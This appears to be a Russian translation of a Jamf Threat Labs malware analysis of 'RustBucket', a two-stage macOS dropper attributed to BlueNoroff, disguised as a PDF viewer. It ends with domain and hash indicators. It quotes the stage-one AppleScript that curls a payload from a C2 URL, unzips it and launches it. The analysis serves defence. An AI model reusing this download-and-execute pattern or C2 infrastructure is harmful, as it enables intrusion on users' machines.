Jamf Threat Labs обнаружила семейство вредоносных программ для macOS, которые связываются с командно-контрольными (C2) серверами для загрузки и выполнения различных полезных нагрузок. Мы отслеживаем и защищаемся от этого семейства вредоносных программ под названием "RustBucket" и подозреваем, что его авторство принадлежит северокорейской группировке, спонсируемой государством. APT-группа под названием BlueNoroff действует как подгруппа известной группы Lazarus Group и, предположительно, стоит за этой атакой.
BlueNoroff APT
Эти сходства включают вредоносный инструментарий на macOS, который полностью соответствует рабочему процессу и шаблонам социальной инженерии тех, кто использовался в кампании.
Вредоносная программа первой стадии (0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be) была обнаружена при выполнении обычной процедуры поиска скомпилированных приложений AppleScript, содержащих различные подозрительные команды. Среди наших результатов мы обнаружили подозрительный файл AppleScript под названием main.scpt, содержащийся в неподписанном приложении под названием Internal PDF Viewer.app. Следует отметить, что у нас нет оснований полагать, что это приложение может выполняться без ручного управления Gatekeeper пользователем.
Структура каталогов первого этапа показана ниже. Как и во всех скомпилированных приложениях AppleScript, основной код приложения находится в файле main.scpt, расположенном в каталоге /Contents/Resources/Scripts/.
tree Internal\ PDF\ Viewer.app/
Internal PDF Viewer.app/
└── Contents
├── Info.plist
├── MacOS
│ └── applet
├── PkgInfo
└── Resources
├── Scripts
│ └── main.scpt
├── applet.icns
├── applet.rsrc
└── description.rtfd
└── TXT.rtfПри запуске выполняет код, показанный ниже:
do shell script "curl -o /users/shared/1.zip hxxps://cloud.dnx.capital/ZyCws4dD_zE/aUhUJV0p6P/S9XrRH9%2B/R51g4b5Kjj/abnY%3D -A cur1"
do shell script "unzip -o -d /users/shared /users/shared/1.zip"
do shell script "open \"/users/shared/Internal PDF Viewer.app\""На первом этапе просто выполняются различные команды сценария do shell для загрузки второго этапа с C2 с помощью curl. Вредоносная программа записывает и извлекает содержимое zip-файла в каталог /Users/Shared/ и запускает приложение stage-two, также названное Internal PDF Viewer.app. Разбивая вредоносную программу на несколько компонентов или этапов, автор вредоносной программы усложняет анализ, особенно если C2 переходит в автономный режим. Это умный, но распространенный прием, используемый авторами вредоносных программ для предотвращения анализа.
Хотя название и значки приложения второго этапа (ca59874172660e6180af2815c3a42c85169aa0b2) очень похожи на первый, структуры каталогов отличаются, и в них не используется AppleScript. Версия приложения, размер и идентификатор пакета - com.apple.pdfViewer - также заметно отличаются, маскируясь под легитимный идентификатор пакета Apple. Это приложение также подписано специальной подписью.
Схема приложения соответствует более традиционному приложению и написана на языке Objective-C.
tree Internal\ PDF\ Viewer.app/
Internal PDF Viewer.app/
└── Contents
├── Info.plist
├── MacOS
│ └── Internal PDF Viewer
├── PkgInfo
├── Resources
│ ├── AppIcon.icns
│ ├── Assets.car
│ └── Base.lproj
│ └── Main.storyboardc
│ ├── Info.plist
│ ├── MainMenu.nib
│ │ ├── keyedobjects-101300.nib
│ │ └── keyedobjects.nib
│ ├── NSWindowController-B8D-0N-5wS.nib
│ │ ├── keyedobjects-101300.nib
│ │ └── keyedobjects.nib
│ └── XfG-lQ-9wD-view-m2S-Jp-Qdl.nib
│ ├── keyedobjects-101300.nib
│ └── keyedobjects.nib
└── _CodeSignature
└── CodeResourcesПри запуске приложения Internal PDF Viewer пользователь получает приложение для просмотра PDF-документов, в котором он может выбирать и открывать PDF-документы. Приложение, хотя и является базовым, на самом деле работает как функциональный просмотрщик PDF. Эта задача не представляет особой сложности при использовании хорошо разработанного Apple фреймворка PDFKit Framework.
После выполнения приложение еще не выполняет никаких вредоносных действий. Для того чтобы вредоносная программа могла сделать следующий шаг и установить связь со злоумышленником, необходимо загрузить правильный PDF-файл. Нам удалось обнаружить вредоносный PDF-файл (7e69cb4f9c37fad13de85e91b5a05a816d14f490), который, по нашему мнению, связан с этой кампанией, поскольку он соответствует всем критериям для запуска вредоносного поведения.
Открыв вредоносный PDF-просмотрщик, пользователь увидит документ (всего 9 страниц), в котором рассказывается о венчурной фирме, заинтересованной в инвестировании в различные технологические стартапы. Насколько мы можем судить, PDF-файл был создан путем взятия веб-сайта небольшой, но легальной венчурной фирмы и перевода его в формат PDF.
Следует отметить, что ранее дроппер первого этапа обращался к cloud[.]dnx[.]capital, таким образом, продолжая тему маскировки венчурной фирмы.
Эта техника просмотра PDF-файлов, используемая злоумышленником, очень умна. На данный момент для проведения анализа нам нужна не только вредоносная программа второго этапа, но и правильный PDF-файл, который работает как ключ для выполнения вредоносного кода в приложении.
Indicators of Compromise
Domains
- cloud.dnx.capital
- deck.31ventures.info
SHA1
- 0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be
- 182760cbe11fa0316abfb8b7b00b63f83159f5aa
- 469236d0054a270e117a2621f70f2a494e7fb823
- 72167ec09d62cdfb04698c3f96a6131dceb24a9c
- 7a5d57c7e2b0c8ab7d60f7a7c7f4649f33fea8aa
- 7e69cb4f9c37fad13de85e91b5a05a816d14f490
- 9121509d674091ce1f5f30e9a372b5dcf9bcd257
- a1a85cba1bc4ac9f6eafc548b1454f57b4dff7e0
- ac08406818bbf4fe24ea04bfd72f747c89174bdb
- be234cb6819039d6a1d3b1a205b9f74b6935bbcc
- ca59874172660e6180af2815c3a42c85169aa0b2
- d9f1392fb7ed010a0ecc4f819782c179efde9687
- dabb4372050264f389b8adcf239366860662ac52
- e0e42ac374443500c236721341612865cd3d1eec
- e7158bb75adf27262ec3b0f2ca73c802a6222379
- fd1cef5abe3e0c275671916a1f3a566f13489416